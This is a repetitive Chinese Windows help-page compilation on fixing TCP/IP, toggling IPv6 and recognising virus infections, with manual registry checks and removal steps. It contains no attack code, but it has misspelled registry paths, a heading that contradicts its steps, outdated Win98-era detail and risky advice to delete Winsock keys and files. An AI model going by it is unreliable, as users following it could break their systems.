原因,该服务依赖的TCP/IP 协议有问题 解决办法: 1、开始——运行——regedit.exe,打开注册表编辑器,删除以下两个键: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2 2、找到 C:\Windows\inf\nettcpip.inf文件 该文件为 tcp/ip协议文件 3、控制面板->网络和Internet->网络和共享中心->更改适配器设置->右键本地连接->属性 先选择TCP/IPv6->安装->协议->添加->从磁盘安装->然后在路径里浏览找到第2步中的文件路径找到nettcpip.inf,确定然后选择“TCP/IPv6”。

对于ipv4协议重复同样的操作,最后选择TCP/IPv4,即: TCP/IPv4->安装->协议->添加->从磁盘安装->然后在路径里浏览找到第2步中的文件路径,nettcpip.inf 然后选择“TCP/IPv4”。

7.win10怎么打开ipv6

首先我们进入电脑的控制面板,可以在“charm bar”上点击“设置”>;“控制面板”。

在“控制面板”窗口找到并点击进入“网络和共享中心”。

这里看到我的电脑有两种网络连接方式,wifi和本地连接,我使用的wifi连接。那么点击“wlan”。

进入“WLAN状态”窗口。看到IPv6并没有使用,是“无网络访问”的状态。

5

点击“属性”按钮,进入“WLAN属性”窗口。IPv6在倒数第二项,看到IPv6也是被勾选的。

6

取消对IPv6的勾选,点击确定,即可关闭IPv6服务。

win10如何判断ipv6

如何判断win10电脑是否中毒

1.如何知道电脑已经中毒了?

一般的症状大概有下面的可能性。

(1)平时运行好端端的电脑,却变得迟钝起来,反应缓慢,出现蓝屏甚至死机.

(2)程序载入的时间变长.有些病毒能控制程序或系统的启动程序,当系统刚开始启动或是一个应用程序被载入时,这些病毒将执行它们的动作,因此要花更多的时间来载入程序.

(3)可执行程序文件的大小改变了.正常情况下,这些程序应该维持固定的大小,但有些病毒会增加程序文件的大小.

(4)对同样一个简单的工作,磁盘却花了要长得多的时间才能完成.例如,原本储存一页的文字只需一秒,但感染病毒可能会花更多的时间来寻找未感染的文件.

(5)没有存取磁盘,但磁盘指示灯却一直在亮.硬盘的指示灯无缘无故一直亮着,意味着电脑可能受到病毒的感染了.

(6)开机后出现陌生的声音,画面或提示信息,以及不寻常的错误信息或乱码.尤其是当这种信息频繁出现时,表明你的系统可能已经中毒了.

(7)系统内存或硬盘的容量突然大幅减少.有些病毒会消耗可观的内存或硬盘容量,曾经执行过的程序,再次执行时,突然告诉你没有足够的内存可以利用,或者硬盘空间意外变小.

(8)文件名称,扩展名,日期,属性等被更改过.

(9)文件的内容改变或被加上一些奇怪的资料.

(10)文件离奇消失.

其实我觉得还是定期查查毒好点。希望对你有所帮助

2.如何知道电脑中毒了

电脑中毒症状一览 1.平时运行好端端的电脑,却变得迟钝起来,反应缓慢,出现蓝屏甚至死机; 2.程序载入的时间变长。

有些病毒能控制程序或系统的启动程序,当系统刚开始启动或是一个应用程序被载入时,这些病毒将执行它们的动作,因此要花更多的时间来载入程序;3.可执行程序文件的大小改变了。正常情况下,这些程序应该维持固定的大小,但有些病毒会增加程序文件的大小; 4.对同样一个简单的工作,磁盘却花了要长得多的时间才能完成。

例如,原本储存一页的文字只需一秒,但感染病毒可能会花更多的时间来寻找未感染的文件; 5.没有存取磁盘,但磁盘指示灯却一直在亮。硬盘的指示灯无缘无故一直在亮着,意味着电脑可能受到病毒感染了; 6.开机后出现陌生的声音、画面或提示信息,以及不寻常的错误信息或乱码。

尤其是当这种信息频繁出现时,表明你的系统可能已经中毒了; 7.系统内存或硬盘的容量突然大幅减少。有些病毒会消耗可观的内存或硬盘容量,曾经执行过的程序,再次执行时,突然告诉你没有足够的内存可以利用,或者硬盘空间意外变小; 8.文件名称、扩展名、日期、属性等被更改过; 9.文件的内容改变或被加上一些奇怪的资料; 10.文件离奇消失。

(如果您的电脑有以上症状出现,请及时"就诊") 如何预防电脑病毒 病毒的传染无非是两种方式:一是网络,二是软盘与光盘。如今由于电子邮件的盛行,通过互联网传递的病毒要远远高于后者。

1、不要轻易下载小网站的软件与程序。 2、不要光顾那些很诱惑人的小网站,因为这些网站很有可能就是网络陷阱。

3、不要随便打开某些来路不明的E-mail与附件程序。 4、安装正版杀毒软件公司提供的防火墙,并注意时时打开着。

5、不要在线启动、阅读某些文件,否则您很有可能成为网络病毒的传播者。 6、经常给自己发封E-mail,看看是否会收到第二封未属标题及附带程序的邮件。

对于软盘,光盘传染的病毒,不要随便打开程序或安装软件。可以先复制到硬盘上,接着用杀毒软件检查一遍,再执行安装或打开命令。

(资料来源:天极网) 电脑病毒的种类 引导区电脑病毒 90年代中期,最为流行的电脑病毒是引导区病毒,主要通过软盘在16位元磁盘操作系统(DOS)环境下传播。引导区病毒会感染软盘内的引导区及硬盘,而且也能够感染用户硬盘内的主引导区(MBR)。

一但电脑中毒,每一个经受感染电脑读取过的软盘都会受到感染。 引导区电脑病毒是如此传播:隐藏在磁盘内,在系统文件启动以前电脑病毒已驻留在内存内。

这样一来,电脑病毒就可完全控制DOS中断功能,以便进行病毒传播和破坏活动。那些设计在DOS或Windows3.1上执行的引导区病毒是不能够在新的电脑操作系统上传播,所以这类的电脑病毒已经比较罕见了。

文件型电脑病毒 文件型电脑病毒,又称寄生病毒,通常感染执行文件(.EXE),但是也有些会感染其它可执行文件,如DLL,SCR等等。每次执行受感染的文件时,电脑病毒便会发作:电脑病毒会将自己复制到其他可执行文件,并且继续执行原有的程序,以免被用户所察觉。

复合型电脑病毒 复合型电脑病毒具有引导区病毒和文件型病毒的双重特点。 宏病毒 宏病毒专门针对特定的应用软件,可感染依附于某些应用软件内的宏指令,它可以很容易透过电子邮件附件、软盘、文件下载和群组软件等多种方式进行传播如MicrosoftWord和Excel。

宏病毒采用程序语言撰写,例如VisualBasic或CorelDraw,而这些又是易于掌握的程序语言。宏病毒最先在1995年被发现,在不久后已成为最普遍的电脑病毒。

特洛伊/特洛伊木马 特洛伊或特洛伊木马是一个看似正当的程序,但事实上当执行时会进行一些恶性及不正当的活动。特洛伊可用作黑客工具去窃取用户的密码资料或破坏硬盘内的程序或数据。

与电脑病毒的分别是特洛伊不会复制自己。它的传播技俩通常是诱骗电脑用户把特洛伊木马植入电脑内,例如通过电子邮件上的游戏附件等。

蠕虫病毒 蠕虫是另一种能自行复制和经由网络扩散的程序。它跟电脑病毒有些不同,电脑病毒通常会专注感染其它程序,但蠕虫是专注于利用网络去扩散。

从定义上,电脑病毒和蠕虫是非不可并存的。随着互联网的普及,蠕虫利用电子邮件系统去复制,例如把自己隐藏于附件并于短时间内电子邮件发给多个用户。

有些蠕虫(如CodeRed),更会利用软件上的漏洞去扩散和进行破坏。 其他电脑病毒/恶性程序码 恶意程序通常是指带有攻击意图所编写的一段程序。

这些威胁可以分成两个类别:需要宿主程序的威胁和彼此独立的威胁。前者基本上是不能独立于某个实际的应用程序、实用程序或系统程序的程序片段;后者是可以被操作系统调度和运行的自包含程序。

也可以将这些软件威胁分成不进行复制工作和进行复制工作的。

3.如何知道电脑中毒了

经常死机:病毒打开了许多文件或占用了大量内存;不稳定(如内存质量差,硬件超频性能差等);运行了大容量的软件占用了大量的内存和磁盘空间;使用了一些测试软件(有许多BUG);硬盘空间不够等等;运行网络上的软件时经常死机也许是由于网络速度太慢,所运行的程序太大,或者自己的工作站硬件配置太低。

2.系统无法启动:病毒修改了硬盘的引导信息,或删除了某些启动文件。如引导型病毒引导文件损坏;硬盘损坏或参数设置不正确;系统文件人为地误删除等。

3.文件打不开:病毒修改了文件格式;病毒修改了文件链接位置。文件损坏;硬盘损坏;文件快捷方式对应的链接位置发生了变化;原来编辑文件的软件删除了;如果是在局域网中多表现为服务器中文件存放位置发生了变化,而工作站没有及时涮新服器的内容(长时间打开了资源管理器)。

4.经常报告内存不够:病毒非法占用了大量内存;打开了大量的软件;运行了需内存资源的软件;系统配置不正确;内存本就不够(目前基本内存要求为128M)等。

5.提示硬盘空间不够:病毒复制了大量的病毒文件(这个遇到过好几例,有时好端端的近10G硬盘安装了一个WIN98或WINNT4.0系统就说没空间了,一安装软件就提示硬盘空间不够。硬盘每个分区容量太小;安装了大量的大容量软件;所有软件都集中安装在一个分区之中;硬盘本身就小;如果是在局域网中系统管理员为每个用户设置了工作站用户的“私人盘”使用空间限制,因查看的是整个网络盘的大小,其实“私人盘”上容量已用完了。

6.软盘等设备未访问时出读写信号:病毒感染;软盘取走了还在打开曾经在软盘中打开过的文件。

7.出现大量来历不明的文件:病毒复制文件;可能是一些软件安装中产生的临时文件;也或许是一些软件的配置信息及运行记录。

8.启动黑屏:病毒感染(记得最深的是98年的4.26,我为CIH付出了好几千元的代价,那天我第一次开机到了Windows画面就死机了,第二次再开机就什么也没有了);显示器故障;显示卡故障;主板故障;超频过度;CPU损坏等等

9.数据丢失:病毒删除了文件;硬盘扇区损坏;因恢复文件而覆盖原文件;如果是在网络上的文件,也可能是由于其它用户误删除了。

10.键盘或鼠标无端地锁死:病毒作怪,特别要留意“木马”;键盘或鼠标损坏;主板上键盘或鼠标接口损坏;运行了某个键盘或鼠标锁定程序,所运行的程序太大,长时间系统很忙,表现出按键盘或鼠标不起作用。

11.系统运行速度慢:病毒占用了内存和CPU资源,在后台运行了大量非法操作;硬件配置低;打开的程序太多或太大;系统配置不正确;如果是运行网络上的程序时多数是由于你的机器配置太低造成,也有可能是此时网路上正忙,有许多用户同时打开一个程序;还有一种可能就是你的硬盘空间不够用来运行程序时作临时交换数据用。

12.系统自动执行操作:病毒在后台执行非法操作;用户在注册表或启动组中设置了有关程序的自动运行;某些软件安装或升级后需自动重启系统。

4.WIN10电脑出现病毒有什么特征么

目前,还没有什么比较常见的病毒特征,这要主要归功于免费安全软件的普及和Windows系统自身安全性的不断提升,电脑大规模中毒的现象减少。当然,病毒也有新的入侵方式,更为隐秘(除了勒索病毒,像前段时间的哭泣勒索病毒就比较高调),这使得我们很难有一个比较明确电脑中毒的特征。

不过,总归是有迹可循的,比如异常的进程(CPU、内存占用过高)、异常上传下载(很难发现)、异常的用户身份等等。

只要你不冒险浏览危险站点、不使用不明来源的软件程序和硬件,时常留意电脑异常,经常查毒杀毒,正所谓有备无患,相信不会很容易感染病毒的。

5.如何知道电脑有没有中毒

了解了电脑病毒的基本知识,我们还必须了解电脑中毒后的一些表现,然后这样会有助于我们判断电脑是否中毒。

在电脑出现以下中毒表现时,是在机器的硬件无故障,软件运行正常的情况下发生的。1、电脑无法启动 电脑感染了引导型病毒后,通常会无法启动,因为病毒破坏了操作系统的引导文件。

最典型的病毒是CIH病毒。2、电脑经常死机 病毒程序打开了较多的程序,或者是病毒自我复制,都会占用大量的CPU资源和内存资源,从而造成机器经常死机。

对于网络病毒,由于病毒为了传播,通过邮件服务和QQ等聊天软件传播,也会造成系统因为资源耗尽而死机。3、文件无法打开 系统中可以执行的文件,突然无法打开。

由于病毒修改了感染了文件,可能会使文件损坏,或者是病毒破坏了可执行文件中操作系统中的关联,都会使文件出现打不开的现象。4、系统经常提示内存不足 现在机器的内存通常是256MB的标准配置,可是在打开很少程序的情况下,系统经常提示内存不足。

部分病毒的开发者,通常是为了让病毒占用大量的系统资源,达到让机器死机的目的。5、机器空间不足 自我复制型的病毒,通常会在病毒激活后,进行自我复制,占用硬盘的大量空间。

6、数据突然丢失 硬盘突然有大量数据丢失,这有可能是病毒具有删除文件的破坏性,导致硬盘的数据突然消失。7、电脑运行速度特别慢 在运行某个程序时,系统响应的时候特别长,响应的时间,超出了正常响应时间的5位以上。

8、键盘、鼠标被锁死 键盘、鼠标在进行BIOS设置时正常,进入系统后无法使用。部分病毒,可以锁定键盘、鼠标在系统中的使用。

9、系统每天增加大量来历不明的文件 病毒进行变种,或者入侵系统时遗留下的垃圾文件。10、系统自动加载某些程序 系统启动时,病毒可能会修改注册表的键值,自动在后台运行某个程序。

部分病毒,如QQ病毒,还会自动发送消息。三、判断电脑是否中毒的方法 我们在了解了病毒的基础知识和中毒表现后,自然会有一些方法,来判断我们的电脑是否中毒。

1、使用杀毒软件进行磁盘扫描 判断病毒的第一步,就是通过杀毒软件进行扫描,查看机器中是否存在病毒。在扫描前,最好升级一下杀毒软件的病毒库。

2、查看硬盘容量 对于自我复制型病毒,查看硬盘容量,可以判断出是否感染了病毒。特别是系统盘的容量大小,大家在平时,一定要了解自己的系统盘容量是多少。

3、检查系统使用的内存数量 正常使用的操作系统,占用的系统资源是一定的。如果系统感染了病毒,病毒肯定会占用内存资源。

对于Windows 98操作系统,进入操作系统后,在DOS提示符下,运行mem /c/p查看内存的使用情况,特别是640Kb的基本内存使用情况!在Windows 2000或者是Windows XP系统下,在“运行”中输入cmd后,执行mem即可。4、使用任务管理器查看进程数量 在Windows 2000和Windows XP操作系统中,可以利用任务管理器,查看一下是否有非法的进程在运行。

对于一些隐蔽性的病毒,在任务管理器中不显示进程。5、查看注册表 部分病毒的运行,需要通过注册表加载的,如恶意网页病毒都会通过注册表加载,这些病毒,在注册表中的加载位置如下:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windwos\CurrentVersion\Run] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windwos\CurrentVersionRunOnce] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windwos\] [HKEY_CURRENT_USER\SOFTWARE\Microsoft \Windows\CurrentVersion\Run] [HKEY_CURRENT_USER\SOFTWARE\Microsoft \Windows\CurrentVersion \RunOnce] 查看注册表中以上几个键值的情况,看一下有没有异常的程序加载。

要想提高判断的准确性,可以把正常运行的机器的这几个键值记录下来,方便比较!6、查看系统配置文件 这类病毒一般在隐藏在System.ini、Wini.ini(Win9x/WinME)和启动组中。在System.ini文件中有一个“Shell=”项,而在Wini.ini文件中有“Load=”、“Run=”项,这些病毒一般就是在这些项目中加载它们自身的程序的,注意有时是修改原有的某个程序。

我们可以运行msconfig.exe程序来一项一项查看。由于Windows 2000操作系统中没有Msconifg这个程序,可以由Windows XP操作系统中复制!7、观察机器的启动和运行速度 对于一些隐蔽性高的病毒,我们通过以上方法无法判断时,可以根据机器的启动和运行速度进行判断,在保证硬件系统无故障和软件系统运行正常的情况下,可以基本断定已经感染病毒!8、特征字符串观察法 这种方法主要是针对一些较特别的病毒,这些病毒入侵时会写相应的特征代码,如CIH病毒就会在入侵的文件中写入“CIH”这样的字符串,当然我们不可能轻易地发现,我们可以对主要的系统文件(如Explorer.exe桌面主程序)运用16进制代码编辑器进行编辑就可发现,当然编辑之前最好还要要备份,不然你修改错了,就没得救了!通过以上的叙述,相信大家对如何判断病毒应该有一个大致的了解了吧。

要想准确判断病毒,还需要了解各种常见病毒的特征及更多的病毒相关知识。

6.如何才能查找自己的电脑是否中毒

如果有杀毒软件的话,那推荐使用,更新到最新的病毒库即可.

如果没杀毒软件,我推荐WINDOWS自己携带的一款软件(XP系统独享).

这个是微软在WINDOWS中集成的,叫做Microsoft Windows Malicious Software Removal Tool,使用这款软件的方法是,点击"开始-运行",在运行中输入,mrt.exe,点击确定打开,在界面中点击"查看次工具检测和删除的恶意软件列表",弹出的列表中就显示了当前可以查杀的所有病毒/恶意程序,点击"下一步"后,即可开始扫描系统,完成后酒会显示扫描结果.

PS:如果WINDOWS没有集成,用WINDOWS UPDATE 升级即可.

如何判断win10电脑是否中毒

win10怎么判断电脑中毒

1.怎样知道你的电脑中毒

1.平时运行好端端的电脑,却变得迟钝起来,反应缓慢,出现蓝屏甚至死机; 2.程序载入的时间变长。

有些病毒能控制程序或系统的启动程序,当系统刚开始启动或是一个应用程序被载入时,这些病毒将执行它们的动作,因此要花更多的时间来载入程序; 3.可执行程序文件的大小改变了。正常情况下,这些程序应该维持固定的大小,但有些病毒会增加程序文件的大小; 4.对同样一个简单的工作,磁盘却花了要长得多的时间才能完成。

例如,原本储存一页的文字只需一秒,但感染病毒可能会花更多的时间来寻找未感染的文件; 5.没有存取磁盘,但磁盘指示灯却一直在亮。硬盘的指示灯无缘无故一直在亮着,意味着电脑可能受到病毒感染了; 6.开机后出现陌生的声音、画面或提示信息,以及不寻常的错误信息或乱码。

尤其是当这种信息频繁出现时,表明你的系统可能已经中毒了; 7.系统内存或硬盘的容量突然大幅减少。有些病毒会消耗可观的内存或硬盘容量,曾经执行过的程序,再次执行时,突然告诉你没有足够的内存可以利用,或者硬盘空间意外变小; 8.文件名称、扩展名、日期、属性等被更改过; 9.文件的内容改变或被加上一些奇怪的资料; 10.文件离奇消失。

(如果您的电脑有以上症状出现,请及时"就诊") 如何预防电脑病毒 病毒的传染无非是两种方式:一是网络,二是软盘与光盘。如今由于电子邮件的盛行,通过互联网传递的病毒要远远高于后者。

1、不要轻易下载小网站的软件与程序。 2、不要光顾那些很诱惑人的小网站,因为这些网站很有可能就是网络陷阱。

3、不要随便打开某些来路不明的E-mail与附件程序。 4、安装正版杀毒软件公司提供的防火墙,并注意时时打开着。

5、不要在线启动、阅读某些文件,否则您很有可能成为网络病毒的传播者。 6、经常给自己发封E-mail,看看是否会收到第二封未属标题及附带程序的邮件。

对于软盘,光盘传染的病毒,不要随便打开程序或安装软件。可以先复制到硬盘上,接着用杀毒软件检查一遍,再执行安装或打开命令。

(资料来源:天极网) 电脑病毒的种类 引导区电脑病毒 90年代中期,最为流行的电脑病毒是引导区病毒,主要通过软盘在16位元磁盘操作系统(DOS)环境下传播。引导区病毒会感染软盘内的引导区及硬盘,而且也能够感染用户硬盘内的主引导区(MBR)。

一但电脑中毒,每一个经受感染电脑读取过的软盘都会受到感染。 引导区电脑病毒是如此传播:隐藏在磁盘内,在系统文件启动以前电脑病毒已驻留在内存内。

这样一来,电脑病毒就可完全控制DOS中断功能,以便进行病毒传播和破坏活动。那些设计在DOS或Windows3.1上执行的引导区病毒是不能够在新的电脑操作系统上传播,所以这类的电脑病毒已经比较罕见了。

文件型电脑病毒 文件型电脑病毒,又称寄生病毒,通常感染执行文件(.EXE),但是也有些会感染其它可执行文件,如DLL,SCR等等。每次执行受感染的文件时,电脑病毒便会发作:电脑病毒会将自己复制到其他可执行文件,并且继续执行原有的程序,以免被用户所察觉。

复合型电脑病毒 复合型电脑病毒具有引导区病毒和文件型病毒的双重特点。 宏病毒 宏病毒专门针对特定的应用软件,可感染依附于某些应用软件内的宏指令,它可以很容易透过电子邮件附件、软盘、文件下载和群组软件等多种方式进行传播如MicrosoftWord和Excel。

宏病毒采用程序语言撰写,例如VisualBasic或CorelDraw,而这些又是易于掌握的程序语言。宏病毒最先在1995年被发现,在不久后已成为最普遍的电脑病毒。

特洛伊/特洛伊木马 特洛伊或特洛伊木马是一个看似正当的程序,但事实上当执行时会进行一些恶性及不正当的活动。特洛伊可用作黑客工具去窃取用户的密码资料或破坏硬盘内的程序或数据。

与电脑病毒的分别是特洛伊不会复制自己。它的传播技俩通常是诱骗电脑用户把特洛伊木马植入电脑内,例如通过电子邮件上的游戏附件等。

蠕虫病毒 蠕虫是另一种能自行复制和经由网络扩散的程序。它跟电脑病毒有些不同,电脑病毒通常会专注感染其它程序,但蠕虫是专注于利用网络去扩散。

从定义上,电脑病毒和蠕虫是非不可并存的。随着互联网的普及,蠕虫利用电子邮件系统去复制,例如把自己隐藏于附件并于短时间内电子邮件发给多个用户。

有些蠕虫(如CodeRed),更会利用软件上的漏洞去扩散和进行破坏。 其他电脑病毒/恶性程序码 恶意程序通常是指带有攻击意图所编写的一段程序。

这些威胁可以分成两个类别:需要宿主程序的威胁和彼此独立的威胁。前者基本上是不能独立于某个实际的应用程序、实用程序或系统程序的程序片段;后者是可以被操作系统调度和运行的自包含程序。

也可以将这些软件威胁分成不进行复制工作和进行复制工作的。

2.怎样知道自己的电脑中病毒了

时下电脑感染病毒的途径,已经由原始的磁盘带入,变为现在承受多种渠道同时攻击,几乎到了防不胜防的地步。有些病毒行踪诡秘、深藏不露;更多的则显山露水,用家细心观察,不难抓住其蛛丝马迹,及早防范,可免遭其害。电脑中毒的十大症状:

1.平时运行好端端的电脑,却变得迟钝起来,反应缓慢,出现蓝屏甚至死机。

2.程序载入的时间变长。有些病毒能控制程序或系统的启动程序,当系统刚开始启动或是一个应用程序被载入时,这些病毒将执行它们的动作,因此要花更多的时间来载入程序。

3.可执行程序文件的大小改变了。正常情况下,这些程序应该维持固定的大小,但有些病毒会增加程序文件的大小。

4.对同样一个简单的工作,磁盘却花了要长得多的时间才能完成。例如,原本储存一页的文字只需一秒,但感染病毒可能会花更多的时间来寻找未感染的文件。

5.没有存取磁盘,但磁盘指示灯却一直在亮。硬盘的指示灯无缘无故一直在亮着,意味着电脑可能受到病毒感染了。

6.开机后出现陌生的声音、画面或提示信息,以及不寻常的错误信息或乱码。尤其是当这种信息频繁出现时,表明你的系统可能已经中毒了 。

7.系统内存或硬盘的容量突然大幅减少。有些病毒会消耗可观的内存或硬盘容量,曾经执行过的程序,再次执行时,突然告诉你没有足够的内存可以利用,或者硬盘空间意外变小。 8.文件名称、扩展名、日期、属性等被更改过。

9.文件的内容改变或被加上一些奇怪的资料。

10.文件离奇消失。

3.怎么看电脑是否中毒了

经常死机:病毒打开了许多文件或占用了大量内存;不稳定(如内存质量差,硬件超频性能差等);运行了大容量的软件占用了大量的内存和磁盘空间;使用了一些测试软件(有许多BUG);硬盘空间不够等等;运行网络上的软件时经常死机也许是由于网络速度太慢,所运行的程序太大,或者自己的工作站硬件配置太低。

系统无法启动:病毒修改了硬盘的引导信息,或删除了某些启动文件。如引导型病毒引导文件损坏;硬盘损坏或参数设置不正确;系统文件人为地误删除等。

文件打不开:病毒修改了文件格式;病毒修改了文件链接位置。文件损坏;硬盘损坏;文件快捷方式对应的链接位置发生了变化;原来编辑文件的软件删除了;如果是在局域网中多表现为服务器中文件存放位置发生了变化,而工作站没有及时涮新服器的内容(长时间打开了资源管理器)。

经常报告内存不够:病毒非法占用了大量内存;打开了大量的软件;运行了需内存资源的软件;系统配置不正确;内存本就不够(目前基本内存要求为128M)等。

提示硬盘空间不够:病毒复制了大量的病毒文件(这个遇到过好几例,有时好端端的近10G硬盘安装了一个WIN98或WINNT4.0系统就说没空间了,一安装软件就提示硬盘空间不够。硬盘每个分区容量太小;安装了大量的大容量软件;所有软件都集中安装在一个分区之中;硬盘本身就小;如果是在局域网中系统管理员为每个用户设置了工作站用户的"私人盘"使用空间限制,因查看的是整个网络盘的大小,其实"私人盘"上容量已用完了。

软盘等设备未访问时出读写信号:病毒感染;软盘取走了还在打开曾经在软盘中打开过的文件。

出现大量来历不明的文件:病毒复制文件;可能是一些软件安装中产生的临时文件;也或许是一些软件的配置信息及运行记录。

启动黑屏:病毒感染(记得最深的是98年的4.26,我为CIH付出了好几千元的代价,那天我第一次开机到了Windows画面就死机了,第二次再开机就什么也没有了);显示器故障;显示卡故障;主板故障;超频过度;CPU损坏等等

数据丢失:病毒删除了文件;硬盘扇区损坏;因恢复文件而覆盖原文件;如果是在网络上的文件,也可能是由于其它用户误删除了。

键盘或鼠标无端地锁死:病毒作怪,特别要留意"木马";键盘或鼠标损坏;主板上键盘或鼠标接口损坏;运行了某个键盘或鼠标锁定程序,所运行的程序太大,长时间系统很忙,表现出按键盘或鼠标不起作用。

系统运行速度慢:病毒占用了内存和CPU资源,在后台运行了大量非法操作;硬件配置低;打开的程序太多或太大;系统配置不正确;如果是运行网络上的程序时多数是由于你的机器配置太低造成,也有可能是此时网路上正忙,有许多用户同时打开一个程序;还有一种可能就是你的硬盘空间不够用来运行程序时作临时交换数据用。

系统自动执行操作:病毒在后台执行非法操作;用户在注册表或启动组中设置了有关程序的自动运行;某些软件安装或升级后需自动重启系统。

4.如何知道自己的电脑有没有中毒?

电脑出现以下中毒表现时,是在机器的硬件无故障,软件运行正常的情况下发生的。

1、电脑无法启动 电脑感染了引导型病毒后,通常会无法启动,因为病毒破坏了操作系统的引导文件。最典型的病毒是CIH病毒。

2、电脑经常死机 病毒程序打开了较多的程序,或者是病毒自我复制,都会占用大量的CPU资源和内存资源,从而造成机器经常死机。对于网络病毒,由于病毒为了传播,通过邮件服务和QQ等聊天软件传播,也会造成系统因为资源耗尽而死机。

3、文件无法打开 系统中可以执行的文件,突然无法打开。由于病毒修改了感染了文件,可能会使文件损坏,或者是病毒破坏了可执行文件中操作系统中的关联,都会使文件出现打不开的现象。

4、系统经常提示内存不足 现在机器的内存通常是256MB的标准配置,可是在打开很少程序的情况下,系统经常提示内存不足。部分病毒的开发者,通常是为了让病毒占用大量的系统资源,达到让机器死机的目的。

5、机器空间不足 自我复制型的病毒,通常会在病毒激活后,进行自我复制,占用硬盘的大量空间。 6、数据突然丢失 硬盘突然有大量数据丢失,这有可能是病毒具有删除文件的破坏性,导致硬盘的数据突然消失。

7、电脑运行速度特别慢 在运行某个程序时,系统响应的时候特别长,响应的时间,超出了正常响应时间的5位以上。 8、键盘、鼠标被锁死 键盘、鼠标在进行BIOS设置时正常,进入系统后无法使用。

部分病毒,可以锁定键盘、鼠标在系统中的使用。 9、系统每天增加大量来历不明的文件 病毒进行变种,或者入侵系统时遗留下的垃圾文件。

10、系统自动加载某些程序 系统启动时,病毒可能会修改注册表的键值,自动在后台运行某个程序。部分病毒,如QQ病毒,还会自动发送消息。

三、判断电脑是否中毒的方法 我们在了解了病毒的基础知识和中毒表现后,自然会有一些方法,来判断我们的电脑是否中毒。 1、使用杀毒软件进行磁盘扫描 判断病毒的第一步,就是通过杀毒软件进行扫描,查看机器中是否存在病毒。

在扫描前,最好升级一下杀毒软件的病毒库。 2、查看硬盘容量 对于自我复制型病毒,查看硬盘容量,可以判断出是否感染了病毒。

特别是系统盘的容量大小,大家在平时,一定要了解自己的系统盘容量是多少。 3、检查系统使用的内存数量 正常使用的操作系统,占用的系统资源是一定的。

如果系统感染了病毒,病毒肯定会占用内存资源。对于Windows 98操作系统,进入操作系统后,在DOS提示符下,运行mem /c/p查看内存的使用情况,特别是640Kb的基本内存使用情况!在Windows 2000或者是Windows XP系统下,在“运行”中输入cmd后,执行mem即可。

4、使用任务管理器查看进程数量 在Windows 2000和Windows XP操作系统中,可以利用任务管理器,查看一下是否有非法的进程在运行。对于一些隐蔽性的病毒,在任务管理器中不显示进程。

5、查看注册表 部分病毒的运行,需要通过注册表加载的,如恶意网页病毒都会通过注册表加载,这些病毒,在注册表中的加载位置如下: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windwos\CurrentVersion\Run] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windwos\CurrentVersionRunOnce] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windwos\] [HKEY_CURRENT_USER\SOFTWARE\Microsoft \Windows\CurrentVersion\Run] [HKEY_CURRENT_USER\SOFTWARE\Microsoft \Windows\CurrentVersion \RunOnce] 查看注册表中以上几个键值的情况,看一下有没有异常的程序加载。要想提高判断的准确性,可以把正常运行的机器的这几个键值记录下来,方便比较! 6、查看系统配置文件 这类病毒一般在隐藏在System.ini、Wini.ini(Win9x/WinME)和启动组中。

在System.ini文件中有一个“Shell=”项,而在Wini.ini文件中有“Load=”、“Run=”项,这些病毒一般就是在这些项目中加载它们自身的程序的,注意有时是修改原有的某个程序。我们可以运行msconfig.exe程序来一项一项查看。

由于Windows 2000操作系统中没有Msconifg这个程序,可以由Windows XP操作系统中复制! 7、观察机器的启动和运行速度 对于一些隐蔽性高的病毒,我们通过以上方法无法判断时,可以根据机器的启动和运行速度进行判断,在保证硬件系统无故障和软件系统运行正常的情况下,可以基本断定已经感染病毒! 8、特征字符串观察法 这种方法主要是针对一些较特别的病毒,这些病毒入侵时会写相应的特征代码,如CIH病毒就会在入侵的文件中写入“CIH”这样的字符串,当然我们不可能轻易地发现,我们可以对主要的系统文件(如Explorer.exe桌面主程序)运用16进制代码编辑器进行编辑就可发现,当然编辑之前最好还要要备份,不然你修改错了,就没得救了。

5.如何检查电脑是否中毒

可以装杀毒软件来查找也可以手动查找,手动过程如下:

1、检查注册表中RUN、RUNSERVEICE等几项,先备份,记下可以启动项的地址, 再将可疑的删除。

2、删除上述可疑键在硬盘中的执行文件。

3、一般这种文件都在WINNT,SYSTEM,SYSTEM32这样的文件夹下,他们一般不会单独存在,很可能是有某个母文件复制过来的,检查C、D、E等盘下有没有可疑的.exe,.com或.bat文件,有则删除之。

4、检查注册表HKEY_LOCAL_MACHINE和HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main中的几项(如Local Page),如果被修改了,改回来就可以。

5、检查HKEY_CLASSES_ROOT\inifile\shell\open\command和 HKEY_CLASSES_ROOT\txtfile\shell\open\command等等几个常用文件类型的默认打开程序是否被更改。这个一定要改回来。很多病毒就是通过修改.txt、.ini等的默认打开程序让病毒“长生不老,永杀不尽”的。

6、如果有可能,对病毒的母文件进行反汇编,比如我上次中的那个病毒,通过用IDA反汇编,发现它还偷窃系统密码并建立 %systemroot%\system\mapis32a.dll 文件把密码送到一个邮箱中,由于我用的是W2K,所以它当然没有得手。

至此,病毒完全删除! 笔者建议有能力的话,时刻注意系统的变化,奇怪端口、可疑进程等等。 现在的病毒都不象以前那样对系统数据破坏很严重,也好发现的多,所以尽量自己杀毒(较简单的病毒、木马)。

win10怎么判断电脑中毒

转载请注明出处windows之家 » win10如何判断电脑被入侵

win10

笔记本win10截图设置键

阅读(3516)

本文主要为您介绍笔记本win10截图设置键,内容包括笔记本电脑按什么键可以截屏,win10的,win10快捷截屏怎么设置,win10笔记本任意截图键。截取全屏 自动保存组合键 同时按住Windows+Print Screen组合键,笔记本则按住Windows+Prt Sc SysRq按

win10

win10怎么设置多个背景

阅读(2066)

本文主要为您介绍win10怎么设置多个背景,内容包括如何在win10中使用多个背景,如何在win10中使用多个背景,win10双桌面怎么设置两个不同的壁纸。直接定位到自己想要设置壁纸的图片文件夹小编一般会把图片先放到电脑默认的壁纸文件夹里默认壁

win10

win10保护眼睛设置不改注册表

阅读(2032)

